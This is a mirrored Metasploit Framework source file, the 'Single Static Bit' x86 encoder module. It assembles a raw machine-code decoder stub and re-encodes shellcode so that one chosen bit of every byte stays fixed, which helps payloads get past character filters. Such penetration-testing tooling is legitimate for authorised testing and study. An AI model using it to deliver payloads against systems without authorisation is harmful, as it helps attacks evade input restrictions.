CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/encoders/x86/single_static_bit.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
#

7
# NOTE: this encoder currently has only be tested using bit 5 set to on.

8
#

9
# The decoder has been tested with all possible values, but the decoder stub

10
# is was not designed to bypass restrictions other than "bit 5 must be on"..

11
#

12
class MetasploitModule < Msf::Encoder

13


14
  # This encoder has a manual ranking because it should only be used in cases

15
  # where information has been explicitly supplied, specifically

16
  # BitNumber and BitValue.

17
  Rank = ManualRanking

18


19
  def initialize

20
    super(

21
      'Name'             => 'Single Static Bit',

22
      'Description'      => 'Static value for specific bit',

23
      'Author'           => 'jduck',

24
      'Arch'             => ARCH_X86,

25
      'License'          => MSF_LICENSE,

26
      'EncoderType'      => Msf::Encoder::Type::SingleStaticBit

27
      )

28


29
    # this shouldn't be present in the decoder stub.

30
    @key_marker = 0x1010

31
  end

32


33
  #

34
  # Returns the decoder stub that is adjusted for the size of

35
  # the buffer being encoded

36
  #

37
  def decoder_stub(state)

38


39
    bit_num = (datastore['BitNumber'] || 5).to_i

40
    bit_val = (datastore['BitValue'] || true)

41


42
    # variables:

43
    # bit to ignore                                  (global - hardcoded)

44
    # buf len (can be deduced with a jmp/call/pop)   (global - ebx)

45
    # current source byte ptr                        (global - esi)

46
    # current dest byte ptr                          (global - edi) ?

47
    # current dest byte                              (global - ah)  ?

48
    # number of bits accumulated                     (global - ebp) ?

49
    # current source byte                            (outer  - al)

50
    # bit index (for this byte)                      (inner  - cl)  ?

51
    pre_init = ""

52
    pre_init << "\x31\xed"        # xor ebp, ebp               - no bits accumulated

53
    pre_init << "\x83\xe1\x01"    # and ecx, $0x1              - init inner loop counter (set to 0/1)

54
    pre_init << "\x83\xe3\x01"    # and ebx, $0x1              - init buffer length

55
    pre_init << "\x66\xbb" + [@key_marker].pack('v')         # - load encrypted buffer length

56
    pre_init << "\x66\x81\xf3" + [@key_marker].pack('v')     # - xor decrypt buffer length

57


58
    # we stored an entire byte, move to the next one

59
    next_byte = ""

60
    next_byte << "\x83\xef\xff"  # sub edi, 0xffffffff         - increment dst pointer

61
    next_byte << "\x31\xed"      # xor ebp, ebp                - no bits accumulated

62


63
    # inside the loop, we need to extract a bit, as

64
    # specified by:

65
    #

66
    # ecx-1  - bit number to extract

67
    # al     - byte to extract it from

68
    get_a_bit = ""

69
    get_a_bit << "\x60"          # pusha                       - save all registers

70
    get_a_bit << "\x83\xe9\x01"  # sub ecx, 1                  - account for 1-based counting

71
    get_a_bit << "\x74\x06"      # jz +6                       - skip dividing if bit zero

72
    get_a_bit << "\xb3\x02"      # mov bl, 2                   - set divisor to 2

73
    # divide_it:

74
    get_a_bit << "\xf6\xf3"      # div bl                      - do the division

75
    get_a_bit << "\xe2" + [-1 * (2+2)].pack('C')             # - divide again..

76
    # store_bit:

77
    get_a_bit << "\x83\xe0\x01"  # and eax, 0x01               - we only want the lowest bit

78
    get_a_bit << "\x6b\x2f\x02"  # imul ebp, 2, [edi]          - load [edi], shifted left by 1, to ebp

79
    get_a_bit << "\x09\xe8"      # or ebp, eax                 - set bit 0

80
    get_a_bit << "\xaa"          # stosb al, [edi]             - store byte back

81
    get_a_bit << "\x61"          # popa                        - restore previous ebx/eax

82
    get_a_bit << "\x83\xed\xff"  # sub ebp, 0xffffffff         - increment bits stored

83


84
    inner_init = ""

85
    inner_init << "\xb1\x08"      # mov cl, $0x8               - init loop counter

86


87
    inner_loop = ""

88
    # process_bits:

89
    inner_loop << "\x80\xf9"     # cmp cl, <ignore_bit + 1>   - is this the one to ignore?

90
    inner_loop << [(bit_num+1)].pack('C')

91
    len = get_a_bit.length + 3 + 2 + next_byte.length

92
    inner_loop << "\x74" + [len].pack('C')                   # - je next_bit

93
    inner_loop << get_a_bit

94
    inner_loop << "\x83\xfd\x08"  # cmp ebp, $0x8              - got 8 bits now?

95
    inner_loop << "\x75" + [next_byte.length].pack('C')      # - jne to next_bit

96
    # next_dst_byte:

97
    inner_loop << next_byte

98
    # next_bit:

99
    # I really wish this silly padding wasn't necessary, however removing the bad characters in the

100
    # jump/call displacements has proven difficult otherwise.

101
    inner_loop << "\x90" * 0x1a   # nops                       - for padding (so relative jumps don't have badchars)

102
    len = -1 * (inner_loop.length+2)

103
    inner_loop << "\xe2" + [len].pack('C')                   # - loop process_bits

104


105
    # prefixed by:                # jmp data_beg_call

106
    outer_init = ""

107
    # get_data_beg:

108
    outer_init << "\x5e"          # pop esi                    - ptr to beginning of data

109
    outer_init << pre_init

110
    outer_init << "\x89\xf7"      # mov edi, esi               - decode in place, init dst ptr

111


112
    outer_loop = ""

113
    #outer_loop << "\x90" * (0xd+6)

114
    outer_loop << "\x83\xe0\x7f"  # and eax, 0x7f              - we only want the low byte

115
    outer_loop << "\xac"          # lods   al, [esi]           - load src byte

116
    outer_loop << inner_init << inner_loop

117
    outer_loop << "\x83\xeb\x01"  # sub ebx, 1                 - 1 byte down!

118
    outer_loop << "\x74\x07"      # jz +(2+5)                  - jump to data!

119
    len = -1 * (outer_loop.length+2)

120
    # next_byte:

121
    outer_loop << "\xeb" + [len].pack('C')                   # - jmp process_byte

122
    # data_beg_call:

123


124
    decoder = outer_init + outer_loop

125
    jmp = "\xeb" + [decoder.length].pack('C')

126
    call = "\xe8" + [-1 * (decoder.length+5)].pack('V')

127
    decoder = jmp + decoder + call

128


129
    # encoded sled

130
    state.context = ''

131


132
    return decoder

133
  end

134


135
  def encode_block(state, block)

136
    bit_num = (datastore['BitNumber'] || 5).to_i

137
    bit_num = (7-bit_num)

138
    bit_val = (datastore['BitValue'] || true)

139


140
    encoded = ''

141
    new_byte = 0

142
    nbits = 0

143


144
    block.unpack('C*').each do |ch|

145
      7.step(0,-1) do |x|

146


147
        # is this the special bit?

148
        if (nbits == bit_num)

149
          new_byte <<= 1 if nbits > 0

150
          new_byte |= 1 if bit_val

151
          nbits += 1

152


153
          # do we have a full byte?

154
          if nbits == 8

155
            encoded << new_byte.chr

156
            new_byte = 0

157
            nbits = 0

158
          end

159
        end

160


161
        # we have space, add it in

162
        new_byte <<= 1 if nbits > 0

163
        new_byte += 1 if (((ch >> x) & 1) > 0)

164
        nbits += 1

165


166
        # do we have a full byte?

167
        if nbits == 8

168
          encoded << new_byte.chr

169
          new_byte = 0

170
          nbits = 0

171
        end

172
      end

173
    end

174


175
    # if we have bits left, pad out to a whole byte

176
    if nbits > 0

177
      while nbits < 8

178
        new_byte <<= 1

179
        new_byte |= 1 if (nbits == bit_num) and bit_val

180
        nbits += 1

181
      end

182
      encoded << new_byte.chr

183
    end

184


185
    return encoded

186
  end

187


188
  #

189
  # Appends the encoded context portion.

190
  #

191
  def encode_end(state)

192
    state.encoded += state.context

193


194
    xor_key = 0

195
    xor_key_str = ''

196
    enc_len_str = ''

197
    loop do

198
      xor_key = rand(0x10000)

199
      xor_key_str = [xor_key].pack('v')

200
      enc_len_str = [state.encoded.length ^ xor_key].pack('v')

201
      next if has_badchars?(xor_key_str, state.badchars)

202
      next if has_badchars?(enc_len_str, state.badchars)

203
      break

204
    end

205


206
    marker_str = [@key_marker].pack('v')

207


208
    state.encoded.sub!(marker_str, enc_len_str)

209
    state.encoded.sub!(marker_str, xor_key_str)

210
  end

211
end

212


213